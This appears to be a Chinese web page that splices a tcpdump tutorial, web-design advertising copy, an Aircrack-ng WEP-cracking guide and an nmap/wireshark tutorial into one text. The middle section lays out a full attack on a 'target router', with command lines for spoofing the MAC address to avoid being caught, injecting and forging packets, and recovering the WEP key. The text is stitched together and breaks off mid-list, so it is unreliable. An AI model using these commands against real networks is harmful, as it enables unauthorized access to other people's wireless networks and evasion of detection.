重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
众所周知,在Windows下开发运行环境下,在调试网络环境时,可以可以很方便的借助wireshark等软件进行抓包分析;并且在linux或者Ubuntu等桌面版里也可以进行安装抓包工具进行抓包分析,但总有一些情况,无法直接运用工具(比如一些没有界面的linux环境系统中),则此时我们就需要使用到最简单的tcpdump命令进行网络抓包。
成都创新互联公司专注于余干网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供余干营销型网站建设,余干网站制作、余干网页设计、余干网站官网定制、微信平台小程序开发服务,打造余干网络公司原创品牌,更为您提供余干网站排名全网营销落地服务。
一般的,linux下抓包时,抓取特定的网络数据包到当前文件夹下的文件中,再把文件拷贝出来利用Windows下的wireshark软件进行分析。
tcpdump命令详解:(简单举例)
1、抓取到的文件为filename.cap,然后将此文件拷贝到Windows下,使用wireshar打开后,即可对此文件进行分析。
2、eth0 是主机的网络适配器名称,具体的参数值可以在linux命令行窗口中通过 ifconfig 指令查询。
Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个: airmon-ng 处理网卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 发包,干扰 另外还要用到以下 linux 命令: ifconfig 查看修改网卡状态和参数 macchanger 伪造 MAC iwconfig 主要针对无线网卡的工具 (同 ifconfig) iwlist 获取无线网络的更详细信息 另外还有其他的 linux 基本命令,我就不提示了。 具体破解步骤: 1. 修改无线网卡状态:先 dow 2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡 4. 修改无线网卡状态: up 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标 6. 监听抓包:生成 .cap 或 .ivs 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1 airodump-ng ath1 aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目标MAC -h 本机MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目标MAC -h 本机MAC ath1 packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目标MAC -h 本机MAC ath1 packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs —————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明) 1. ifconfig 用来配置网卡,我们这里主要用来 禁用和启用 网卡: ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是为了下一步修改 MAC 。 2.macchanger 用来改变网卡的 MAC 地址,具体用法如下: usage: macchanger [options] device -h 显示帮助 -V 显示版本 -s 显示当前MAC -e 不改变mac,使用硬件厂商写入的MAC -a 自动生成一个同类型的MAC,同厂商的 -A 自动生成一个不同类型的MAC,不同厂商的 -r 生成任意MAC -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品 -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 启动无线网卡进入 Monitor 模式, useage: airmon-ng startstopcheck interface [channel] startstopcheck启动,停止,检测 interface指定无线网卡 [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了 4.iwconfig 专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。 useage:iwconfig interface [options] [essid{NNONOFF}] 指定essid号 开启关闭 [nwid{NNonoff}] 指定网络id号 开启关闭 [mode {managedad-hoc....}] 指定无线网络工作模式/类型 [freq N.NNNN[KMG]] 指定工作频率 [channel N] 指定频道 [ap {Noffauto}] 指定AP号 关闭/自动 [sens N] sens 号 [nick N] nick 号 [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范围 [power {period Ntimeout N}] 电源 频率/超时 [retry {limit Nlifetime N}] 重试 限次/超时 [txpower N{mwdBm}] 功率 毫瓦/分贝 [commit] 处理 5.iwlist 主要用来显示无线网卡的一些附加信息,同上 useage: iwlist [interface] options scanning 扫描 frequency 频率 channel 频道 bitrate 速率 rate 速率 encryption 加密 key 密钥 power 电源 txpower 功率 ap ap accespoints ap peers 直连 event 事件 6.airodump-ng 抓包工具,我最喜欢用的,详细用法如下: usage: airodump-ng options interface[,interface,...] Options: --ivs :仅将抓取信息保存为 .ivs --gpsd :使用 GPSd --write prefix :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分 -w :同 --write --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的 --update secs :显示更新延迟,没有用过 --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了 -h :隐藏已知的,配合上面的选项使用 -f msecs :跳频时间 --berlin secs :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注) -r file :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵 Filter options: --encrypt suite : 使用密码序列过滤 AP --netmask netmask : 使用掩码过滤 AP --bssid bssid : 使用 bssid 过滤 AP -a : 过滤无关的客户端 默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作: --channel channels:指定频道 --band abg :制定带宽 -C frequencies :指定频率MHz --cswitch method : 设置频道交换方式 0 : FIFO (default) 先进先出(默认) 1 : Round Robin 循环 2 : Hop on last 最后一跳 -s : 同上 --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文 7.aireplay-ng
介绍Linux环境下网络工具的使用,netstat从内部查看网络的状况,显示网络连接、路由表、接口等信息,我们使用netstat –lntup,l是监听,n是用数字格式显示,如用ip地址、端口号都用数字表示,t是tcp信息,u是udp信息,p是端口。
端口扫描工具nmap,是一款黑客使用的工具,建议大家不要用来扫描公网ip,以避免有法律纠纷争议,我们用nmap常用参数nmap –sT 172.1.1.1来扫描内网一台服务器,该台服务器开放的端口有22、23、443.
我们还可以对操作系统信息进行扫描,用命令nmap –sS -O 172.1.1.1来扫描该台设备的版本信息进行扫描,通过扫描不仅知道端口开放的情况,也知道扫描的设备是什么型号。
我们介绍tcpdump的使用,从管理的网络里面获取流量,对获取的包进行分析,我们通过命令tcpdump -i eth0 对网卡eth0的流量进行抓取,参数-i是接口的意思。当前我们获取了信息包括CDP的一些信息,可以通过cdp信息查看到核心交换机的信息,还可以看到一些生成树的信息。
下面我们介绍一款在Linux环境下更为直观的抓包软件wireshark,首先需要对该软件进行安装,我们通过yum install wireshark安装软件,按照系统提示一步步安装,直至安装全部完成。
我们同时还可以安装图形化的wireshark软件,通过命令yum list wire*看可以显示可以安装的首字母是wire所有软件,这里的*是通配符,匹配任意字符,这里的wireshark-gnome.x86_64是图形化的软件,我们通过yum install wireshark-gnome.x86_64,安装成功后的使用在windows下面使用是相同的,可以选择一块网卡进行抓包并对抓的包进行过滤分析。